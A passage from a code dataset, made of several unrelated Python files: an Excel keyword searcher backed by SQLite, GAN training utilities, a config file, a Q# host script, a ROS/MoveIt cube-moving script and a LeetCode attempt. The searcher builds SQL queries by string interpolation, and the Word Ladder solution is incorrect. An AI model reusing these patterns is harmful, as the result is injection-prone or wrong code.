all entries with a specific DataCategoryID\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"\n SELECT FileHash, FileName\n FROM categorization \n WHERE DataCategoryID = {DataCategoryID}\n ORDER BY RANDOM();\"\"\"\n ## Random order helps processors avoid starting on the same file\n cursor.execute(sql)\n files = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_all_category.__name__))\n log_file.write('\\n')\n return files\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_all_category.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_update_state(self, FileHash, StateID):\n \"\"\"\n Updates text files in the database as needed using the unique FileHash.\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n #Data to Update\n sql = f\"\"\"\n UPDATE state\n SET StateID = {StateID}\n WHERE FileHash = \"{FileHash}\"\n \"\"\"\n cursor.execute(sql)\n # Commit and Close\n conn.commit()\n conn.close()\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_update_state.__name__))\n log_file.write('\\n')\n return True\n\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_update_state.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_insert_statistics(self, FileHash, ProcessingStartTime, ProcessingEndTime, ElapsedTime):\n \"\"\"\n Updates text files in the database as needed using the unique FileHash.\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n #Data to Update\n sql = f\"\"\"\n INSERT OR IGNORE INTO statistics \n VALUES (\n \"{FileHash}\", \n \"{ProcessingStartTime}\",\n \"{ProcessingEndTime}\",\n \"{ElapsedTime}\"\n );\n \"\"\"\n cursor.execute(sql)\n # Commit and Close\n conn.commit()\n conn.close()\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_insert_statistics.__name__))\n log_file.write('\\n')\n return True\n\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_insert_statistics.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _search_excel_legacy(self, filename):\n \"\"\"\n Searches a legacy excel file using the keywords list included in the class. \n Writes findings to a file, using the keyword as the filename. \n Assumes files are XLS format. 
\n        \"\"\"\n        try:\n            wb = xlrd.open_workbook(filename)\n            sheets = wb.sheet_names()\n            for sheet_name in sheets:\n                ws = wb.sheet_by_name(sheet_name)\n                for row_idx in range(0, ws.nrows):    # Iterate through rows\n                    for col_idx in range(0, ws.ncols):  # Iterate through columns\n                        cell = ws.cell(row_idx, col_idx)  # Get cell object by row, col\n                        if cell.value: # Ignore empty cells\n                            for keyword in self.keywords:\n                                if re.search(keyword, str(cell.value), re.IGNORECASE):\n                                    keyword_result_file = os.path.join(self.results_dir, keyword + \".txt\")\n                                    with open(keyword_result_file, 'a') as krs:\n                                        # file_basename = os.path.split(filename)[1] #Only the filename\n                                        # str() so numeric cells do not raise a TypeError on concatenation\n                                        result = filename + \"---\" + str(cell.value)\n                                        krs.write(result)\n                                        krs.write(\"\\n\")\n            with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                log_file.write(\"[{} Success]{}\".format(self._search_excel_legacy.__name__,filename))\n                log_file.write('\\n')\n            return True\n        except Exception as e:\n            with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n                log_file.write(\"[{} Failure]{} --- {}\".format(self._search_excel_legacy.__name__,filename, str(e)))\n                log_file.write('\\n')\n            return False\n\n    def process_excel_legacy(self):\n        # Allowing some time for the DB to be set up, need a better way to handle this\n        sleep(60)\n        self._load_values()\n\n        allloaded = self._sql_select_load_status()\n        categorizing = self._sql_select_all_category(self.notdetermined)\n        processing = self._sql_select_processing_status()\n\n        while allloaded == 0 or categorizing or processing:\n            files = self._sql_select_ready(self.excellegacy, self.categorized) #Must match the database value\n            if files:\n                for filehash, filename in tqdm(files, desc=\"Progress\"):\n                    ProcessingStartTime = datetime.now()\n                    if self._search_excel_legacy(filename):\n                        ProcessingEndTime = datetime.now()\n                        ElapsedTime = ProcessingEndTime - ProcessingStartTime\n                        self._sql_update_state(filehash, self.processed)\n                        self._sql_insert_statistics(filehash, ProcessingStartTime, ProcessingEndTime, ElapsedTime)\n                    else:\n                        self._sql_update_state(filehash, self.error)\n\n            allloaded = self._sql_select_load_status()\n            categorizing = self._sql_select_all_category(self.notdetermined)\n            sleep(30)\n    \ndef main():\n    working_dir = \"Data\"\n    \n    dbm = DatabaseManager(working_dir)\n    db = dbm.check_database()\n    if db is False:\n        exit()\n    \n    searcher = SearcherExcelLegacy(working_dir, db)\n    searcher.process_excel_legacy()\n\nif __name__ == \"__main__\":\n    main()","sub_path":"SearcherExcelLegacy/SearcherExcelLegacy.py","file_name":"SearcherExcelLegacy.py","file_ext":"py","file_size_in_byte":18734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"390608624","text":"from autoproxy import Proxy, Config\n\np = Proxy(url = \"http://twitter.com\")\np.filter()\n\n# This method will not keep track of how many times you've used the proxies.\nfor i in p.proxies:\n    print(i)\n\n# To keep track of proxy use, instead, use:\nprint(p.use_proxy())\n\n# Notice on running this, the last proxy `used` value will be 1.\n","sub_path":"examples/example_proxies.py","file_name":"example_proxies.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"234556599","text":"import pickle\nimport random\nimport tqdm\nimport torch\nimport operator\nimport cv2\nimport glob\nfrom PIL import Image\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport numpy as np\nimport time\nfrom 
matplotlib.offsetbox import OffsetImage, AnnotationBbox\nimport torch.autograd as autograd\nimport matplotlib.pyplot as plt\nfrom torchvision.utils import save_image\nimport os\ndef pickle_dump(obj,path):\n    with open(path,mode=\"wb\") as f:\n        pickle.dump(obj, f)\ndef pickle_load(path):\n    with open(path,mode=\"rb\") as f:\n        data=pickle.load(f)\n    return data\ndef return_index(label,weight):\n    dice = list(range(len(label)))\n    # Set the weights so that some faces (e.g. a six) come up more often\n    if len(weight) == 0:\n        samples = random.choices(dice)\n    else:\n        samples = random.choices(dice, k=1, weights=[1 /w **2 for w in weight])\n    return samples\ndef label_preprocess(text):\n    global tag_vectors\n    text=text.replace(\"-\", \" \")\n    tokens=text.split()\n    return tokens\ndef tile_like(x, img):\n    x = x.view(x.size(0), x.size(1), 1, 1)\n    x = x.repeat(1, 1, img.size(2), img.size(3))\n    return x\ndef check_coverage(vocab, embeddings_index):\n    a = {}\n    oov = {}\n    k = 0\n    i = 0\n    for word in tqdm.tqdm(vocab):\n        try:\n            a[word] = embeddings_index[word]\n            k += vocab[word]\n        except:\n            oov[word] = vocab[word]\n            i += vocab[word]\n            pass\n\n    print('Found embeddings for {:.2%} of vocab'.format(len(a) / len(vocab)))\n    print('Found embeddings for {:.2%} of all text'.format(k / (k + i)))\n    sorted_x = sorted(oov.items(), key=operator.itemgetter(1))[::-1]\n\n    return sorted_x\n\ndef compute_gradient_penalty(D, real_samples, fake_samples, Tensor, label = None, char_class = None):\n    \"\"\"Calculates the gradient penalty loss for WGAN GP.\n    Warning: It doesn't compute the gradient w.r.t the labels, only w.r.t\n    the interpolated real and fake samples, as in the WGAN GP paper.\n    \"\"\"\n    # Random weight term for interpolation between real and fake samples\n    alpha = Tensor(np.random.random((real_samples.size(0), 1, 1, 1)))\n    # Get random interpolation between real and fake samples\n    interpolates = (alpha * real_samples + ((1 - alpha) * fake_samples)).requires_grad_(True)\n    d_interpolates = D(interpolates)[0].view(-1, 1)\n    fake = Tensor(d_interpolates.shape[0], 1).fill_(1.0)\n    fake.requires_grad = False\n    # Get gradient w.r.t. 
interpolates\n    gradients = autograd.grad(\n        outputs=d_interpolates,\n        inputs=interpolates,\n        grad_outputs=fake,\n        create_graph=True,\n        retain_graph=True,\n        only_inputs=True,\n    )\n    gradients = gradients[0].view(gradients[0].size(0), -1)\n    gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()\n    del gradients, d_interpolates\n    return gradient_penalty\ndef Generate_img(epoch, G_model, ID, device, source_img, noise, label, log_dir):\n    label = Multilabel_OneHot(label, len(ID))\n    G_model.eval()\n    with torch.no_grad():\n        source_img = source_img\n        # source_img = torch.cat([tensor.expand(len(label), z_dim) for tensor in torch.chunk(source_img, 5, dim=0)], axis=0)\n        #Generate samples with the Generator\n        noise = noise.expand(len(source_img), -1, -1, -1)\n        label = label.to(device)\n        samples = G_model(noise, source_img, label)[0].data.cpu()\n        samples = torch.cat([source_img[0:26].data.cpu(), (samples/2)+0.5], dim = 0)\n        save_image(samples,os.path.join(log_dir, 'epoch_%05d.png' % (epoch)), nrow = 26)\ndef loss_plot(log_dir,D_loss_list,G_loss_list):\n    fig = plt.figure(figsize=(10,7))\n    loss = fig.add_subplot(1,1,1)\n    loss.plot(range(len(D_loss_list)),D_loss_list,label='Discriminator_loss')\n    loss.plot(range(len(G_loss_list)),G_loss_list,label='Generator_loss')\n    loss.set_xlabel('epoch')\n    loss.set_ylabel('loss')\n    loss.legend()\n    loss.grid()\n    fig.show()\n    plt.show()\n    fig.savefig(os.path.join(log_dir,\"train_loss.png\"))\ndef make_randomwalk(log_dir):\n    files = sorted(glob.glob(os.path.join(log_dir,'logs_cWGAN/epoch_*.png')))\n    images = list(map(lambda file : Image.open(file) , files))\n    images[0].save(os.path.join(log_dir,'randomwalk.gif') , save_all = True , append_images = images , duration = 100 , loop = 0)\ndef split_list(l, n):\n    for idx in range(0,len(l),n):\n        yield l[idx:idx+n]\ndef pseudo_hamming(v1, v2):\n    start_time=time.time()\n    v1 = v1.reshape(-1,64,64)\n    v2 = v2.reshape(-1,64,64)\n    bin_img1 = np.where(v1 > 127, 255, 0).astype(np.uint8)\n    bin_img2 = np.where(v2 > 127, 255, 0).astype(np.uint8)\n    mask_img1 = np.where(bin_img1 > 127, 0, 1).astype(np.uint8)\n    mask_img2 = np.where(bin_img2 > 127, 0, 1).astype(np.uint8)\n    dist_img1 = np.array([cv2.distanceTransform(b1, cv2.DIST_L2, 3) for b1 in bin_img1])\n    dist_img2 = np.array([cv2.distanceTransform(b2, cv2.DIST_L2, 3) for b2 in bin_img2])\n    masked_dist_img1 = np.multiply(dist_img1, mask_img2)\n    masked_dist_img2 = np.multiply(dist_img2, mask_img1)\n    merged_masked_dist_img = masked_dist_img1 + masked_dist_img2\n    total = np.sum(merged_masked_dist_img)\n    end_time =time.time()\n    return total\ndef learning_curve(dict, path, title ='learning_curve', x_label = 'epoch', y_label = 'loss'):\n    plt.figure()\n    plt.title(title)\n    plt.xlabel(x_label)\n    plt.ylabel(y_label)\n    # Plot the training score and the test score\n    for key, value in dict.items():\n        plt.plot(range(len(value)), np.array(value), label=str(key))\n    plt.legend()\n    plt.savefig(path)\n    plt.clf()\n    plt.close()\ndef mean_average_precision(y_pred, y_true):\n    average_precisions = []\n    device = y_pred.device\n    # Compute AP for each class\n    y_true = y_true.T\n    y_pred = y_pred.T\n    for i in range(len(y_true)):\n        sort_idx = torch.argsort(y_pred[i], descending=True)\n        y_true_sorted = y_true[i][sort_idx]\n        cumsum = torch.cumsum(y_true_sorted, dim=0)\n        precision = cumsum / torch.arange(1, 1 + y_true[i].shape[0]).to(device)\n        # Representative points (precision at each true positive)\n        mask = (y_true_sorted==1)\n        average_precisions.append(precision[mask].mean().item())\n    return sum(average_precisions)/len(y_true), average_precisions\ndef kl_divergence(input, target, activation = None):\n    
entropy = -(target[target != 0] * target[target != 0].log()).sum()\n    if activation == 'softmax':\n        cross_entropy = -(target * F.log_softmax(input, dim=1)).sum()\n    elif activation == 'sigmoid':\n        cross_entropy = -(target * F.logsigmoid(input)).sum()\n    else:\n        cross_entropy = -(target * input).sum()\n    return (cross_entropy - entropy) / input.size(0)\ndef imscatter(x, y, image_list, ax=None, zoom=0.2, color='black'):\n    for i in range(len(image_list)):\n        if ax is None:\n            ax = plt.gca()\n\n        image = image_list[i] # plt.imread(image_list[i])\n        im = OffsetImage(image, zoom=zoom)\n        artists = []\n        x0 = x[i]\n        y0 = y[i]\n        ab = AnnotationBbox(im, (x0, y0), xycoords='data', frameon=False, bboxprops=dict(color=color))\n        artists.append(ax.add_artist(ab))\n    return artists\ndef Multilabel_OneHot(labels, n_categories, dtype=torch.float32, normalize = True):\n    batch_size = len(labels)\n    one_hot_labels = torch.zeros(size=(batch_size, n_categories), dtype=dtype)\n    for i, label in enumerate(labels):\n        # Subtract 1 from each LongTensor because your\n        # indexing starts at 1 and tensor indexing starts at 0\n        label = torch.LongTensor(label)-1\n        one_hot_labels[i] = one_hot_labels[i].scatter_(dim=0, index=label, value=1.)\n    \n    if normalize:\n        return torch.mul(one_hot_labels, 1/one_hot_labels.sum(axis = 1).view(-1, 1))\n    else:\n        return one_hot_labels\ndef extract(G_model, target, inputs):\n    def forward_hook(module, inputs, outputs):\n        # Record the forward-pass output in the global variable \"features\"\n        global features\n        features = outputs.detach()\n\n    # Register the callback function.\n    handle = target.register_forward_hook(forward_hook)\n\n    # Run inference\n    G_model.eval()\n    G_model(inputs)\n\n    # Remove the callback function.\n    handle.remove()\n\n    return features\nclass CXLoss(nn.Module):\n    def __init__(self, sigma=0.1, b=1.0, similarity=\"consine\"):\n        super(CXLoss, self).__init__()\n        self.similarity = similarity\n        self.sigma = sigma\n        self.b = b\n\n    def center_by_T(self, featureI, featureT):\n        # Calculate mean channel vector for feature map.\n        meanT = featureT.mean(0, keepdim=True).mean(2, keepdim=True).mean(3, keepdim=True)\n        return featureI - meanT, featureT - meanT\n\n    def l2_normalize_channelwise(self, features):\n        # Normalize on channel dimension (axis=1)\n        norms = features.norm(p=2, dim=1, keepdim=True)\n        features = features.div(norms)\n        return features\n\n    def patch_decomposition(self, features):\n        N, C, H, W = features.shape\n        assert N == 1\n        P = H * W\n        # NCHW --> 1x1xCXHW --> HWxCx1x1\n        patches = features.view(1, 1, C, P).permute((3, 2, 0, 1))\n        return patches\n\n    def calc_relative_distances(self, raw_dist, axis=1):\n        epsilon = 1e-5\n        # [0] means get the value, torch min will return the index as well\n        div = torch.min(raw_dist, dim=axis, keepdim=True)[0]\n        relative_dist = raw_dist / (div + epsilon)\n        return relative_dist\n\n    def calc_CX(self, dist, axis=1):\n        W = torch.exp((self.b - dist) / self.sigma)\n        W_sum = W.sum(dim=axis, keepdim=True)\n        return W.div(W_sum)\n\n    def forward(self, featureT, featureI):\n        '''\n        :param featureT: target\n        :param featureI: inference\n        :return:\n        '''\n\n        # print(\"featureT target size:\", featureT.shape)\n        # print(\"featureI inference size:\", featureI.shape)\n\n        featureI, featureT = self.center_by_T(featureI, featureT)\n\n        featureI = self.l2_normalize_channelwise(featureI)\n        featureT = self.l2_normalize_channelwise(featureT)\n\n        dist = []\n        N = featureT.size()[0]\n        for i in range(N):\n            # NCHW\n            featureT_i = featureT[i, :, :, :].unsqueeze(0)\n            # NCHW\n            featureI_i = featureI[i, :, :, :].unsqueeze(0)\n            featureT_patch = 
self.patch_decomposition(featureT_i)\n            # Calculate cosine similarity\n            dist_i = F.conv2d(featureI_i, featureT_patch)\n            dist.append(dist_i)\n\n        # NCHW\n        dist = torch.cat(dist, dim=0)\n\n        raw_dist = (1. - dist) / 2.\n\n        relative_dist = self.calc_relative_distances(raw_dist)\n\n        CX = self.calc_CX(relative_dist)\n\n        CX = CX.max(dim=3)[0].max(dim=2)[0]\n        CX = CX.mean(1)\n        CX = -torch.log(CX)\n        CX = torch.mean(CX)\n        return CX\ndef tile(a, dim, n_tile):\n    init_dim = a.size(dim)\n    repeat_idx = [1] * a.dim()\n    repeat_idx[dim] = n_tile\n    a = a.repeat(*(repeat_idx))\n    order_index = torch.LongTensor(np.concatenate([init_dim * np.arange(n_tile) + i for i in range(init_dim)]))\n    return torch.index_select(a, dim, order_index)\ndef split_list(l, n):\n    \"\"\"\n    Split a list into sublists\n    :param l: the list\n    :param n: number of elements per sublist\n    :return: \n    \"\"\"\n    for idx in range(0, len(l), n):\n        yield l[idx:idx + n]\n\ndef visualizer(path, G_model, z, char_num, label, device):\n    G_model.eval()\n    z_shape = z.shape\n    label_shape = label.shape\n    char = torch.eye(char_num).repeat(z_shape[0] * label_shape[0], 1).to(device)\n    z = tile(z, 0, char_num).repeat(label_shape[0], 1).to(device)\n    label = tile(label, 0, char_num * z_shape[0]).to(device)\n    with torch.no_grad():\n        samples = G_model(z, char, label)[0].data.cpu()\n        samples = F.interpolate(samples, (64, 64), mode='nearest')\n        samples = samples/2 + 0.5\n        save_image(samples, path, nrow=char_num)\n\nclass FocalLoss(nn.Module):\n    def __init__(self, gamma=2):\n        super(FocalLoss, self).__init__()\n        self.gamma = gamma\n\n    def forward(self, input, target):\n        target = target.float()\n        # BCELossWithLogits\n        max_val = (-input).clamp(min=0)\n        loss = input - input * target + max_val + \\\n            ((-max_val).exp() + (-input - max_val).exp()).log()\n\n        invprobs = F.logsigmoid(-input * (target * 2.0 - 1.0))\n        loss = (invprobs * self.gamma).exp() * loss\n        if len(loss.size()) == 2:\n            loss = loss.sum(dim=1)\n        return loss.mean()\n\nclass KlLoss(nn.Module):\n    def __init__(self, activation = None):\n        super(KlLoss, self).__init__()\n        self.activation = activation\n    def forward(self, input, target):\n        entropy = -(target[target != 0] * target[target != 0].log()).sum()\n        if self.activation == 'softmax':\n            cross_entropy = -(target * F.log_softmax(input, dim=1)).sum()\n        elif self.activation == 'sigmoid':\n            cross_entropy = -(target * F.logsigmoid(input)).sum()\n        else:\n            cross_entropy = -(target * input).sum()\n        return (cross_entropy - entropy) / (input.size(0))\n\nclass CALoss(nn.Module):\n    def __init__(self):\n        super(CALoss, self).__init__()\n    def forward(self, mu, logvar):\n        # -0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n        KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)\n        KLD = torch.mean(KLD_element).mul_(-0.5)\n        return KLD\n\nif __name__ == '__main__':\n    loss = FocalLoss()\n    input = torch.tensor([0.2,0.5, 0.7, 0.21, 0.4]).view(1, -1)\n    target= torch.tensor([0, 1, 0, 1, 0]).view(1, -1)\n    loss(input, target)","sub_path":"mylib.py","file_name":"mylib.py","file_ext":"py","file_size_in_byte":13747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"349991072","text":"import os\nparams = {\n  \"model_type\": \"dsc\",\n  \"model_name\": \"test\",\n  \"version\": \"0.0\",\n  \"num_images\": 100,\n  \"vectorize_images\": True,\n  \"norm_images\": False,\n  \"whiten_images\": False,\n  \"contrast_normalize\": False,\n  \"extract_patches\": True,\n  \"num_patches\": 1e3,\n  \"patch_edge_size\": 16,\n  \"overlapping_patches\": True,\n  \"randomize_patches\": 
True,\n \"patch_variance_threshold\": 1e-6,\n \"batch_size\": 100,\n \"norm_weights\": False,\n \"optimizer\": \"annealed_sgd\",\n \"rectify_u\": False,\n \"rectify_v\": False,\n \"num_u\": 576,\n \"num_v\": 20,\n \"num_steps\": 20,\n \"cp_int\": 2000,\n \"max_cp_to_keep\": 2,\n #\"w_init_loc\": os.path.expanduser(\"~\")+\"/Work/Projects/pretrain/analysis/0.0/weights/phi.npz\",\n \"w_init_loc\": None,\n \"cp_load\": False,\n \"cp_load_name\": \"pretrain\",\n \"cp_load_step\": 120000,\n \"cp_load_ver\": \"0.0\",\n \"cp_load_var\": [\"phi\"],\n \"cp_set_var\": [\"a\"],\n \"log_int\": 1,\n \"log_to_file\": False,\n \"gen_plot_int\": 2,\n \"save_plots\": True,\n \"eps\": 1e-12,\n \"device\": \"/cpu:0\",\n \"rand_seed\": 1234567890,\n \"out_dir\": os.path.expanduser(\"~\")+\"/Work/Projects/\",\n \"data_dir\": os.path.expanduser(\"~\")+\"/Work/Datasets/\"}\n\nschedule = [\n #{\"weights\": [\"a\"],\n #\"recon_mult\": 0.1,\n #\"sparse_mult\": 0.0,\n #\"a_decay_mult\": 1.0,\n #\"b_decay_mult\": 0.0,\n #\"u_step_size\": 0.01,\n #\"v_step_size\": 0.0,\n #\"weight_lr\": [0.1],\n #\"decay_steps\": [2000],\n #\"decay_rate\": [0.9],\n #\"staircase\": [True],\n #\"num_batches\": 2000}]#,\n\n {\"weights\": [\"a\", \"b\"],\n \"recon_mult\": 1.0,\n \"sparse_mult\": 0.1,\n \"a_decay_mult\": 0.8,\n \"b_decay_mult\": 0.8,\n \"u_step_size\": 0.01,\n \"v_step_size\": 0.001,\n \"weight_lr\": [0.1, 0.001],\n \"decay_steps\": [5000]*2,\n \"decay_rate\": [0.8]*2,\n \"staircase\": [True]*2,\n \"num_batches\": 5000}]\n","sub_path":"params/dsc_params.py","file_name":"dsc_params.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"92585165","text":"class Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n completed = 0\n start = beginWord\n length = len(beginWord)\n output = length*[0]\n for i in range(completed, len(wordList)):\n for j in range(length):\n if start.replace(start[j], '', 1) == wordList[i].replace(wordList[i][j], '', 1):\n start = wordList[i]\n output[completed] = wordList[i]\n wordList[i] = wordList[completed]\n wordList[completed] = output[completed]\n completed = completed + 1\n break\n for p in range(length):\n if start.replace(start[p], '', 1) == endWord.replace(endWord[p], '', 1):\n print(output)\n return completed + 2\n","sub_path":"LeetCode/WordLadder.py","file_name":"WordLadder.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"429330185","text":"import json\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\nplt.style.use('ggplot')\n\nimport qsharp\n\nqsharp.packages.add(\"Microsoft.Quantum.MachineLearning::0.11.2004.2825\")\nqsharp.reload()\n\nfrom ml_module import (\n TrainHalfMoonModel, ValidateHalfMoonModel, ClassifyHalfMoonModel\n)\n\n\n\nif __name__ == \"__main__\":\n with open('data.json') as f:\n data = json.load(f)\n parameter_starting_points = [\n [0.060057, 3.00522, 2.03083, 0.63527, 1.03771, 1.27881, 4.10186, 5.34396],\n [0.586514, 3.371623, 0.860791, 2.92517, 1.14616, 2.99776, 2.26505, 5.62137],\n [1.69704, 1.13912, 2.3595, 4.037552, 1.63698, 1.27549, 0.328671, 0.302282],\n [5.21662, 6.04363, 0.224184, 1.53913, 1.64524, 4.79508, 1.49742, 1.545]\n ]\n\n (parameters, bias) = TrainHalfMoonModel.simulate(\n trainingVectors=data['TrainingData']['Features'],\n 
trainingLabels=data['TrainingData']['Labels'],\n initialParameters=parameter_starting_points\n )\n\n miss_rate = ValidateHalfMoonModel.simulate(\n validationVectors=data['ValidationData']['Features'],\n validationLabels=data['ValidationData']['Labels'],\n parameters=parameters, bias=bias\n )\n\n print(f\"Miss rate: {miss_rate:0.2%}\")\n\n # Classify the validation so that we can plot it.","sub_path":"HalfMoonModel/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"303997021","text":"#!/usr/bin/env python\nimport copy\nimport math\nimport sys\nimport rospy\nimport tf\nimport random\nimport tf_conversions\nfrom gazebo_msgs.srv import DeleteModel, SpawnModel\nfrom sensor_msgs.msg import JointState\n\n# from geometry_msgs.msg import Point, Pose, Quaternion\nimport geometry_msgs\n\nimport moveit_commander\nimport moveit_msgs.msg\n\nfrom gazebo_msgs.srv import GetModelState\nfrom gazebo_msgs.srv import GetWorldProperties\n\n\ndef jointStatesCallback(msg):\n global currentJointState\n currentJointState = msg\n\n\ndef gripper_close():\n # Setup subscriber\n # rospy.Subscriber(\"/joint_states\", JointState, jointStatesCallback)\n\n pub = rospy.Publisher(\"/jaco/joint_control\", JointState, queue_size=1)\n\n currentJointState = rospy.wait_for_message(\"/joint_states\", JointState)\n rospy.loginfo(\"Received!\")\n currentJointState.header.stamp = rospy.get_rostime()\n tmp = 0.75\n # tmp_tuple=tuple([tmp] + list(currentJointState.position[1:]))\n currentJointState.position = tuple(\n list(currentJointState.position[:6]) + [tmp] + [tmp] + [tmp]\n )\n rate = rospy.Rate(10) # 10hz\n for i in range(3):\n pub.publish(currentJointState)\n rospy.loginfo(\"Published!\")\n rate.sleep()\n\n return 0\n\n\ndef gripper_open():\n # Setup subscriber\n # rospy.Subscriber(\"/joint_states\", JointState, jointStatesCallback)\n\n pub = rospy.Publisher(\"/jaco/joint_control\", JointState, queue_size=1)\n\n currentJointState = rospy.wait_for_message(\"/joint_states\", JointState)\n rospy.loginfo(\"Received!\")\n currentJointState.header.stamp = rospy.get_rostime()\n tmp = 0.005\n # tmp_tuple=tuple([tmp] + list(currentJointState.position[1:]))\n currentJointState.position = tuple(\n list(currentJointState.position[:6]) + [tmp] + [tmp] + [tmp]\n )\n rate = rospy.Rate(10) # 10hz\n for i in range(3):\n pub.publish(currentJointState)\n rospy.loginfo(\"Published!\")\n rate.sleep()\n\n return 0\n\n\ndef find_cube(models, model_coordinates, robot, scene):\n # find all models with cube in them\n model_names = [i for i in models().model_names if \"cube\" in i]\n\n # height = 1.4\n # remove all objects from scene (does not work)\n # scene.world.collision_objects.clear()\n cube_poses = []\n\n for model_name in model_names:\n # extract all positions\n p = geometry_msgs.msg.PoseStamped()\n p.header.frame_id = robot.get_planning_frame()\n p.pose = model_coordinates(model_name, \"\").pose\n p.pose.position.z += 0.17\n\n cube_poses.append(p)\n # scene.add_box(model_name, p, (0.05, 0.05, 0.05))\n # rospy.loginfo(model_name)\n # rospy.loginfo(p)\n rospy.loginfo(cube_poses)\n # to access a position do cube_poses[0].x\n return cube_poses\n\n\ndef find_bucket(models, model_coordinates, robot, scene):\n # Find the position of the bucket\n\n # Search of the object \"bucket\" in the model_states topic\n model_names = [i for i in models().model_names if \"bucket\" in i]\n p = geometry_msgs.msg.PoseStamped()\n 
p.header.frame_id = robot.get_planning_frame()\n p.pose = model_coordinates(model_names[0], \"\").pose\n p.pose.position.z += 0.09\n scene.add_box(model_names[0], p, (0.22, 0.22, 0.20))\n\n return p.pose\n\n\ndef add_table_scene(robot, scene):\n # Find the position of the bucket\n\n # Search of the object \"bucket\" in the model_states topic\n p = geometry_msgs.msg.PoseStamped()\n p.header.frame_id = robot.get_planning_frame()\n p.pose.position.x = 0\n p.pose.position.y = 0\n p.pose.position.z = 0.683\n scene.add_box(\"table\", p, (2, 2, 0.10))\n\n rospy.loginfo(p)\n\n return p.pose\n\n\n# def move_path(models, model_coordinates, p, scene, group, robot):\ndef move_path(\n group, goal_pose, display_trajectory_publisher, vert_approach=True, vert_offset=0.25\n):\n rospy.sleep(0.2)\n curr_pose = group.get_current_pose().pose\n rospy.loginfo(\"Initial pose...\\n{}\".format(curr_pose.position))\n\n waypoints = []\n waypoints.append(curr_pose)\n\n curr_pose.orientation = goal_pose.orientation\n waypoints.append(curr_pose)\n move_a2b(group, waypoints, display_trajectory_publisher)\n\n # movin to vert_offset m above\n waypoints = []\n curr_pose = group.get_current_pose().pose\n waypoints.append(curr_pose)\n inter_pose = copy.deepcopy(goal_pose)\n inter_pose.position.z += vert_offset\n waypoints.append(inter_pose)\n move_a2b(group, waypoints, display_trajectory_publisher)\n\n # dipping down for cubes\n if vert_approach:\n waypoints = []\n curr_pose = group.get_current_pose().pose\n waypoints.append(curr_pose)\n waypoints.append(goal_pose)\n move_a2b(group, waypoints, display_trajectory_publisher)\n\n gripper_close()\n rospy.sleep(0.5)\n\n # resetting above to avoid collisions\n waypoints = []\n curr_pose = group.get_current_pose().pose\n waypoints.append(curr_pose)\n waypoints.append(inter_pose)\n move_a2b(group, waypoints, display_trajectory_publisher)\n else:\n gripper_open()\n rospy.sleep(0.5)\n\n # printing final position\n rospy.loginfo(\n \"Final position...\\n{}\".format(group.get_current_pose().pose.position)\n )\n\n\ndef move_a2b(group, waypoints, display_trajectory_publisher):\n rospy.loginfo(\n \"Moving from...\\n{}\\nto...\\n{}\".format(\n waypoints[0].position, waypoints[-1].position\n )\n )\n (plan1, _) = group.compute_cartesian_path(waypoints, 0.01, 0.0)\n # rospy.sleep(2.0)\n # waiting for RViz to display path\n display_trajectory = moveit_msgs.msg.DisplayTrajectory()\n display_trajectory.trajectory_start = robot.get_current_state()\n display_trajectory.trajectory.append(plan1)\n display_trajectory_publisher.publish(display_trajectory)\n rospy.sleep(1.0)\n\n # Moving to a pose goal\n group.execute(plan1, wait=True)\n rospy.sleep(0.5)\n\n\nif __name__ == \"__main__\":\n rospy.init_node(\"move_cubes\")\n models = rospy.ServiceProxy(\"/gazebo/get_world_properties\", GetWorldProperties)\n model_coordinates = rospy.ServiceProxy(\"/gazebo/get_model_state\", GetModelState)\n\n # initializing moveit related things\n moveit_commander.roscpp_initialize(sys.argv)\n scene = moveit_commander.PlanningSceneInterface()\n robot = moveit_commander.RobotCommander()\n group = moveit_commander.MoveGroupCommander(\"Arm\")\n\n display_trajectory_publisher = rospy.Publisher(\n \"/move_group/display_planned_path\",\n moveit_msgs.msg.DisplayTrajectory,\n queue_size=1e3,\n )\n rospy.sleep(2)\n\n group.set_goal_orientation_tolerance(0.01)\n 